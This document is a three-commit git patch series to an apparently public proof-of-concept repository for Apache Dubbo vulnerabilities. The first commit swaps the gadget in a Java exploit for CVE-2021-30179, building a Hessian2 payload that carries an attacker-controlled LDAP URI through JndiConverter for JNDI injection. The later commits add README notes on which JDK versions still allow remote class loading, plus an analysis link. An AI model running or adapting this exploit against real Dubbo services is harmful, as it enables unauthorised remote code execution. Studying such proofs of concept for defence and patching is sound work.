From a0f69bb842d1b1f5527bd434cab099e06304fcf3 Mon Sep 17 00:00:00 2001 From: lz2y <55266300+lz2y@users.noreply.github.com> Date: Wed, 28 Jul 2021 09:59:19 +0800 Subject: [PATCH 1/3] Update CVE202130179.java --- src/main/java/top/lz2y/vul/CVE202130179.java | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/src/main/java/top/lz2y/vul/CVE202130179.java b/src/main/java/top/lz2y/vul/CVE202130179.java index cb902c3..bce3ebe 100644 --- a/src/main/java/top/lz2y/vul/CVE202130179.java +++ b/src/main/java/top/lz2y/vul/CVE202130179.java @@ -86,10 +86,8 @@ private static void getRawReturnPayload(Hessian2ObjectOutput out, String ldapUri } private static void getBeanPayload(Hessian2ObjectOutput out, String ldapUri) throws IOException { -// JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7); -// javaBeanDescriptor.setProperty("asText",ldapUri); - JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("com.sun.rowset.JdbcRowSetImpl",7); - javaBeanDescriptor.setProperty("AutoCommit",ldapUri); + JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7); + javaBeanDescriptor.setProperty("asText",ldapUri); out.writeObject(new Object[]{javaBeanDescriptor}); HashMap map = new HashMap(); From 7838ec3cbdcc85ee19b57ddaec2494aaa7fc8d03 Mon Sep 17 00:00:00 2001 From: lz2y <55266300+lz2y@users.noreply.github.com> Date: Wed, 28 Jul 2021 11:18:42 +0800 Subject: [PATCH 2/3] Update README.md --- README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.md b/README.md index 7369758..3baefbf 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,11 @@ Apache Dubbo 漏洞POC - [ ] others * 免责声明 * 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责 +* 注意事项 + * 需要用到JNDI注入的POC请于低版本的JDK版本测试(项目在8u71中测试) + > * 基于RMI的利用方式,JDK版本限制于6u132、7u131、8u121之前,在8u122及之后的版本中,加入了反序列化白名单的机制,关闭了RMI远程加载代码 + > * 基于LDAP的利用方式,JDK版本限制于6u211、7u201、8u191、11.0.1之前,在8u191版本中,Oracle对LDAP向量设置限制,发布了CVE-2018-3149,关闭JNDI远程类加载 + > * From:https://www.freebuf.com/vuls/279465.html * 参考链接 From 89a3a723be68e1f7da38708744bc0e73758b9fe3 Mon Sep 17 00:00:00 2001 From: lz2y <55266300+lz2y@users.noreply.github.com> Date: Thu, 28 Oct 2021 22:34:07 +0800 Subject: [PATCH 3/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=20=E5=88=86=E6=9E=90?= =?UTF-8?q?=E6=96=87=E7=AB=A0=E9=93=BE=E6=8E=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 3baefbf..7720122 100644 --- a/README.md +++ b/README.md @@ -20,3 +20,5 @@ Apache Dubbo 漏洞POC * [GHSL-2021-034_043: Multiple pre-auth RCEs in Apache Dubbo](https://securitylab.github.com/advisories/GHSL-2021-034_043-apache-dubbo/) * [dubbo源码浅析:默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658) +* 分析文章 + * https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg